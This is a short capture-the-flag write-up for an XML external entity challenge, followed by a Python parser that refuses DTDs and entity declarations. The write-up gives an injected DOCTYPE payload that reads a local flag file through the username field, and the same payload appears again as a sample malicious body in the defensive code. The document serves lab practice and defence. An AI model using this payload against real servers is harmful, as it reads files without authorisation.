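Submit any value to find where the input is echoed back: it is the username field. Capture the request and modify it as follows:

<!DOCTYPE user[<!ENTITY xxx SYSTEM "file:///c:/flag" > ]> &xxx;

Send it to Repeater and run it to find the flag.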
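The server-side fix for the request above, as an added example that is not part of the original write-up: a parser that refuses any DOCTYPE or entity declaration before reading the fields. The function names, the password element and both sample bodies are assumptions constructed for illustration.

```python
from xml.parsers import expat


class ForbiddenXML(ValueError):
    """Raised when a request body carries a DTD or entity declaration."""


def _forbid(kind):
    def handler(*_args):
        raise ForbiddenXML(f"{kind} not allowed in request XML")
    return handler


def parse_fields(body: bytes) -> dict:
    """Return {element name: text} for elements with text, refusing any DTD."""
    fields, text = {}, []
    p = expat.ParserCreate()
    # Rejecting the DOCTYPE stops parsing before any entity can be defined.
    p.StartDoctypeDeclHandler = _forbid("DOCTYPE")
    p.EntityDeclHandler = _forbid("ENTITY declaration")
    p.ExternalEntityRefHandler = _forbid("external entity reference")

    def end(name):
        value = "".join(text).strip()
        if value:
            fields[name] = value
        text.clear()

    p.StartElementHandler = lambda _name, _attrs: text.clear()
    p.EndElementHandler = end
    p.CharacterDataHandler = text.append
    p.Parse(body, True)
    return fields


def is_rejected(body: bytes) -> bool:
    """True when the body is refused (DTD present or XML malformed)."""
    try:
        parse_fields(body)
    except (ForbiddenXML, expat.ExpatError):
        return True
    return False


# Constructed sample bodies; the element layout is assumed, not from the page.
BENIGN = b"<user><username>alice</username><password>pw</password></user>"
MALICIOUS = (b'<?xml version="1.0"?><!DOCTYPE user[<!ENTITY xxx SYSTEM '
             b'"file:///c:/flag" > ]><user><username>&xxx;</username>'
             b"<password>pw</password></user>")
```

A body that uses &xxx; without declaring it is also refused, because expat reports the undefined entity as a parse error.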